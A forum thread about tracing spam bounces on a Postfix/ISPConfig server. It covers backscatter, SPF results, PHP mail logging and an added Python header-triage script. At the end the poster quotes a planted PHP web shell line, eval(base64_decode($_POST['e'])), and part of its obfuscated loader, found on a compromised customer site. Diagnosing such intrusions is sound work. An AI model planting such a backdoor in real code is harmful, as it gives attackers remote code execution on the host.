Hello, I have a problem with spam being sent. Every day I receive messages in the style "Undelivered Mail Returned to Sender". These "return" emails come from external mail servers. In the returned email I get an .eml file, where I can see that the sender is e.g. [email protected], where "agnes_boyd" is not my username, but mydomain.com is my correct and current domain.

Code:
Return-Path: <[email protected]>
Received: from mydomain.com (hosting.mydomain.com [my.ip.address])
    by a2-selva6.bol.com.br (Postfix) with ESMTP id 3kLZbX1hP2zKLbDY
    for <lo[email protected]>; Mon, 12 Jan 2015 10:53:26 -0200 (BRST)

Please help me, what can be wrong? In the log I don't see the emails being sent; I only receive "not delivered" or bounced emails (after sending) from external mail servers. main.cf looks OK; below is part of main.cf.

Code:
smtpd_helo_restrictions = permit_mynetworks, permit_sasl_authenticated, reject_non_fqdn_helo_hostname, reject_invalid_helo_hostname, reject_unknown_helo_hostname
smtpd_delay_reject = yes
smtpd_recipient_restrictions = permit_mynetworks, permit_sasl_authenticated, reject_unauth_destination, reject_unknown_sender_domain, reject_non_fqdn_recipient, check_recipient_access mysql:/etc/postfix/mysql-virtual_recipient.cf, reject_unknown_recipient_domain, check_policy_service inet:127.0.0.1:10023, reject_rbl_client xbl.spamhaus.org, reject_rbl_client bl.spamcop.net
smtpd_tls_security_level = may
transport_maps = hash:/var/lib/mailman/data/transport-mailman, proxy:mysql:/etc/postfix/mysql-virtual_transports.cf
relay_domains = mysql:/etc/postfix/mysql-virtual_relaydomains.cf
relay_recipient_maps = mysql:/etc/postfix/mysql-virtual_relayrecipientmaps.cf
proxy_read_maps = $local_recipient_maps $mydestination $virtual_alias_maps $virtual_alias_domains $virtual_mailbox_maps $virtual_mailbox_domains $relay_recipient_maps $relay_domains $canonical_maps $sender_canonical_maps $recipient_canonical_maps $relocated_maps $transport_maps $mynetworks
smtpd_client_restrictions = permit_mynetworks, permit_sasl_authenticated, reject_unknown_client_hostname, check_client_access mysql:/etc/postfix/mysql-virtual_client.cf, reject_rbl_client cbl.abuseat.org

On ISPConfig I have a few domains, and only one of them has this problem. From the other domains I get no emails of this kind.
Can somebody help me? I noticed that when I add, e.g., this non-existent email [email protected] to the blacklist, the problem for that email address goes away. But then I receive 4 more undeliverable emails from new non-existent addresses... Please, how do I solve this? Nothing in the queue, nothing in the logs about sent emails. What is wrong?
But this does not mean that your server has sent the email. It just means that the sender used your domain as the from address.
But the undeliverable emails I received have a source like the one below, using my IP and my domain :/ "lula_holmes" is the next non-existent mailbox.

Code:
Received: from na01-bl2-obe.outbound.protection.outlook.com (207.46.163.207) by CIO-KRC-HT01.osuad.osu.edu (164.107.81.37) with Microsoft SMTP Server (TLS) id 14.3.174.1; Thu, 15 Jan 2015 00:23:16 -0500
Received: from BY2FFO11FD027.protection.gbl (10.1.14.31) by BY2FFO11HUB036.protection.gbl (10.1.14.179) with Microsoft SMTP Server (TLS) id 15.1.49.13; Thu, 15 Jan 2015 05:23:14 +0000
Received: from MYDOMAIN.COM (MY SRV IP) by BY2FFO11FD027.mail.protection.outlook.com (10.1.15.216) with Microsoft SMTP Server id 15.1.59.14 via Frontend Transport; Thu, 15 Jan 2015 05:23:13 +0000
Date: Thu, 15 Jan 2015 06:23:11 +0100
From: Lula Holmes <[email protected]>
Reply-To: Lula Holmes <[email protected]>
Message-ID: <[email protected]>
To: <hobson.2[email protected]>
Subject: Fw: Elena Grimaldi - Anal Threesome MMF
LOL, I love the subject at the bottom of the snippet. As Till said, nothing you have stated or provided so far indicates that these emails are in fact being sent from your server. Just because you receive an email message with "Undelivered Mail Returned to Sender", it does not mean that your server sent the original message. As Till suggested, it would be trivial to forge these messages. This is a common spamming technique known as "back-scatter". See: http://its.fsu.edu/Email/Spam-Virus-Email-Filtering/Spoofing-backscatter I recommend that you implement appropriate spam-filtering mechanisms on the server in question, namely, clamav, Amavis, and SpamAssassin. And, ideally, postgrey and SPF-checking.
Hi, thanks for the answers. I have already implemented amavis and postgrey on the server, and the messages still come. So is it normal, then, that my server is sometimes on a blacklist because of these spam messages, once per month?
And what about SpamAssassin and SPF-checking? Also, your server shouldn't be blacklisted because of this. You are receiving these bogus emails, not sending them. Correct?
Correct, because I don't see these emails in the mail log. If I send from my own email account, I see it in the mail log. SpamAssassin: incoming email headers are marked ***SPAM*** or bounced. Today I received this email:

Code:
Received-SPF: Fail (protection.outlook.com: domain of MYDOMAIN does not designate 207.46.163.185 as permitted sender)

So SPF checking works. But for some emails I have:

Code:
Received: from BLUPR08CA0042.namprd08.prod.outlook.com (10.141.200.22) by BL2PR08MB065.namprd08.prod.outlook.com (10.242.196.12) with Microsoft SMTP Server (TLS) id 15.1.59.20; Mon, 19 Jan 2015 12:50:49 +0000
Received: from BY2FFO11FD004.protection.gbl (2a01:111:f400:7c0c::156) by BLUPR08CA0042.outlook.office365.com (2a01:111:e400:88d::22) with Microsoft SMTP Server (TLS) id 15.1.59.20 via Frontend Transport; Mon, 19 Jan 2015 12:50:49 +0000
Received: from MYDOMAIN (MY IP) by BY2FFO11FD004.mail.protection.outlook.com (10.1.14.158) with Microsoft SMTP Server id 15.1.75.11 via Frontend Transport; Mon, 19 Jan 2015 12:50:48 +0000
Date: Mon, 19 Jan 2015 13:50:47 +0100
From: Stacie Mcbride <stacie_mcbride@MYDOMAIN>
Reply-To: "Stacie Mcbride" <stacie_mcbride@MYDOMAIN>
Message-ID: <14b32d7-e3243-5b@MYDOMAIN>
To: <[email protected]>
Subject: FW: Hi, A daily updated list showing a variety of free ******* picture and movie galleries
X-Priority: 3 (Normal)
MIME-Version: 1.0
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
Return-Path: stacie_mcbride@MYDOMAIN
X-EOPAttributedMessage: 0
Received-SPF: Pass (protection.outlook.com: domain of MYDOMAIN designates MY IP as permitted sender) receiver=protection.outlook.com; client-ip=MY IP; helo=MY DOMAIN;
Authentication-Results: spf=pass (sender IP is MY IP) smtp.mailfrom=stacie_mcbride@MY DOMAIN; und.nodak.edu; dkim=none (message not signed) header.d=none;und.nodak.edu; dmarc=permerror action=none header.from=MY DOMAIN;

So it looks like these emails could be from my server, but they are not in the logs? :/
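As an added example (my own script, not code from this thread or from ISPConfig): a small Python triage for a bounced original that reads the earliest Received: hop and the Received-SPF result, to tell a message that genuinely left the poster's server IP from plain backscatter that only borrowed the domain. 203.0.113.10 and example.net are placeholders for "MY IP" and "MYDOMAIN", the sample headers are constructed after the ones quoted above, and the hop parser accepts both the Exchange-style "(ip)" and the Postfix-style "(rdns [ip])" forms that appear in this thread.

```python
import re
from email import message_from_string

# Constructed sample modelled on the bounced original quoted above;
# 203.0.113.10 and example.net are placeholders for "MY IP" / "MYDOMAIN".
OUR_IP = "203.0.113.10"
OUR_DOMAIN = "example.net"
SAMPLE = """\
Received: from BY2FFO11FD004.protection.gbl (2a01:111:f400:7c0c::156) by BLUPR08CA0042.outlook.office365.com (2a01:111:e400:88d::22) with Microsoft SMTP Server (TLS) id 15.1.59.20; Mon, 19 Jan 2015 12:50:49 +0000
Received: from example.net (203.0.113.10) by BY2FFO11FD004.mail.protection.outlook.com (10.1.14.158) with Microsoft SMTP Server id 15.1.75.11; Mon, 19 Jan 2015 12:50:48 +0000
From: Stacie Mcbride <stacie_mcbride@example.net>
Return-Path: stacie_mcbride@example.net
Received-SPF: Pass (protection.outlook.com: domain of example.net designates 203.0.113.10 as permitted sender) client-ip=203.0.113.10; helo=example.net;
Subject: FW: constructed sample
"""

# Matches "from host (ip)" (Exchange style) and "from host (rdns [ip])" (Postfix style).
RECEIVED_FROM = re.compile(r"from\s+(\S+)\s+\(([^)]*)\)", re.IGNORECASE)

def first_hop(msg):
    """(HELO name, address field) of the earliest Received: header. Headers are
    prepended, so the last one is where the message entered the mail system;
    the IP recorded there by the receiving MTA is the only trustworthy part."""
    hops = msg.get_all("Received", [])
    m = RECEIVED_FROM.search(hops[-1]) if hops else None
    return (m.group(1), m.group(2)) if m else None

def spf_result(msg):
    """First token of Received-SPF ('pass', 'fail', ...), or 'none' if absent."""
    spf = msg.get("Received-SPF", "").strip()
    return spf.split(" ", 1)[0].lower() if spf else "none"

def triage(raw, our_ip=OUR_IP, our_domain=OUR_DOMAIN):
    """'sent-from-our-ip': a host at our address injected the message (look for a
    compromised script or account). 'spoofed': only the From domain is ours."""
    msg = message_from_string(raw)
    hop = first_hop(msg)
    info = {"hop": hop, "spf": spf_result(msg)}
    if hop and our_ip in re.split(r"[\s\[\]]+", hop[1]):
        info["verdict"] = "sent-from-our-ip"
    elif our_domain.lower() in msg.get("From", "").lower():
        info["verdict"] = "spoofed"
    else:
        info["verdict"] = "unrelated"
    return info

if __name__ == "__main__":
    print(triage(SAMPLE))
```

Run it over the original attached to each bounce; a "spoofed" verdict with the poster's Postfix bounce format would show a first hop that is not hosting.mydomain.com at all.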
Okay, good to see that SpamAssassin flags the forged bounce messages as spam, and that SPF-checking seems to work. Given the rest of what you said, perhaps you have a compromised PHP script or similar that is allowing somebody to send mail from your server. I see this problem with compromised WordPress installations all the time. If a PHP script is responsible for sending the mail, it is possible that you will not have much (if any) evidence in your Postfix logs. Two things I would do immediately:

1.) Modify your PHP configuration such that all mail activity is logged.
2.) Modify your PHP configuration such that the user under which the PHP process is running when mail is sent is included in the message headers.

If these messages really are being sent from your server, these two measures will help immensely in tracking down the source. While I have not implemented it myself, this subject is discussed at length in https://www.howtoforge.com/how-to-log-emails-sent-with-phps-mail-function-to-detect-form-spam , which is probably worth a read. Curious to see what you find...
I have already read this and implemented it. So now I'm waiting for logs. BTW, if we are talking about the PHP mail function, it has already been disabled (since last year) in the ISPConfig portal under "Option" for this domain: Is this correct?
That's correct, but in your case it just complicates the problem. If the spammers used the mail function, you would be able to identify the spam in mail.log and also see the sending script in the mail headers. But when the function is disabled, the spammers have to upload their own SMTP library to send mail, and that's not easy to detect, as you won't get any logs in that case and even the log script won't show anything. What you can try is to find the sending script with lsof, but this will only give useful results when you catch it while it is currently sending.
Unfortunately, via the mail function, nothing in the logs :/ (a test email via test.php was in the log, so logging works correctly). But I think I have solved the problem. I checked the customers' websites, and in one log I found some errors from PHP sites. Digging deeper, I found the .php file which generated the error lines:

Code:
eval(base64_decode($_POST['e']));

and, in the same file:

Code:
return base64_decode($vNS0QU3);}

followed by $v0O2K6T being assigned a long concatenation of base64 string chunks, etc. etc. etc., 1510 lines in total. I deleted these .php files and the spam problem is gone. Since yesterday, no "undeliverable" emails.